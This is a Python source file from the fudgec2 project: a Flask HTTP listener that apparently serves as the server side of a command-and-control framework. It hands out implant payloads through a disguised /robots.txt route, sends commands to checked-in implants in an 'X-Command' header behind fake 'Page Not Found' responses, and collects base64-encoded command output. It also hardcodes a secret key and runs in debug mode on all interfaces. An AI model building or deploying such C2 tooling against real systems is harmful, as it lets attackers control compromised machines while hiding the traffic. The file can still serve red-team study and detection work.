Codebase list fudgec2 / 9efa3053-3ebd-43b9-ba52-25607284fb4a/upstream Listeners / HttpListener.py
9efa3053-3ebd-43b9-ba52-25607284fb4a/upstream

Tree @9efa3053-3ebd-43b9-ba52-25607284fb4a/upstream (Download .tar.gz)

HttpListener.py @9efa3053-3ebd-43b9-ba52-25607284fb4a/upstreamraw · history · blame 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
from flask import Flask, render_template, flash, request, jsonify, g, current_app,url_for, redirect, make_response, send_file, send_from_directory
import base64
from Implant.Implant import ImplantSingleton
from Data.Database import Database
Imp=ImplantSingleton.instance
def ImplantManager(a):
    if "X-Implant" in a:
        print("Checked in implant is: ",a["X-Implant"])



db=Database()
hello_world = None
app = Flask(__name__)
app.config.from_object(__name__)
app.config['SECRET_KEY'] = '7d441f27d441f27567d441f2b6176a'

@app.before_request
def before_request():
    # Check IP Whitelist and reject if configured.
    return

@app.after_request
def add_header( r):
    #r.headers["X-Command"] = a
    return r


# -- This should be extracted and added into a new stager specific listener
@app.route("/robots.txt",methods=['GET'])
def Stager():
    # This needs to return the implant!
    # -- TODO:
    # -- Build checking before triggering this!
    b = db.Register_NewImplantFromStagerKey(request.values['user'])
    if b:
        output_from_parsed_template = Imp.GeneratePayload(b)
    else:
        return "404", 404
    return output_from_parsed_template

@app.route("/index", methods=['GET','POST'])
def ImplantCheckIn():
    # Should check ANY connection in against all configured implant options (IE body, header etc)
    #   unlike they 'headers' options which is configured in the current iteration.
    #print(request.headers)
    if 'X-Implant' in request.headers:
        db.Update_ImplantLastCheckIn(request.headers['X-Implant'])
        CmdToExecute = Imp.IssueCommand(request.headers['X-Implant'])
        #print("::",CmdToExecute)
        Resp = make_response("Page Not Found")
        if CmdToExecute !="==":
            print("ImplantCheckIn: ",CmdToExecute)
        Resp.headers["X-Command"] = CmdToExecute
    else:

        Resp = make_response("Page Not Found")
        Resp.headers["X-Command"] = "=="
    return Resp

@app.route("/help",methods=['GET','POST'])
def ImplantCommandResult():
    if "X-Result" in request.headers:
        # -- X-Result is a placeholder header and should be changed to a more realistic value
        DecodedResponse = base64.b64decode(request.headers["X-Result"]).decode('utf-16')
        Imp.CommandResponse(DecodedResponse)
    return "Page Not Found"


@app.route("/node/<id>", methods=['POST'])
def getNode(id):
    return


@app.route("/aaa",methods=["GET"])
def testing():
    print(0)



def print_time(threadName, delay):
    app.run(debug=True, host='0.0.0.0', port=5000, threaded=True)

if __name__ == "__main__":

    #I=Implant.ImplantSingleton
    app.run(debug=True, host='0.0.0.0', port=5000, threaded=True)
    print ("App running")
    from time import sleep
    while True:
        sleep(1)
        #a = raw_input("Enter PS command: ")
        #I.AddCommand(a)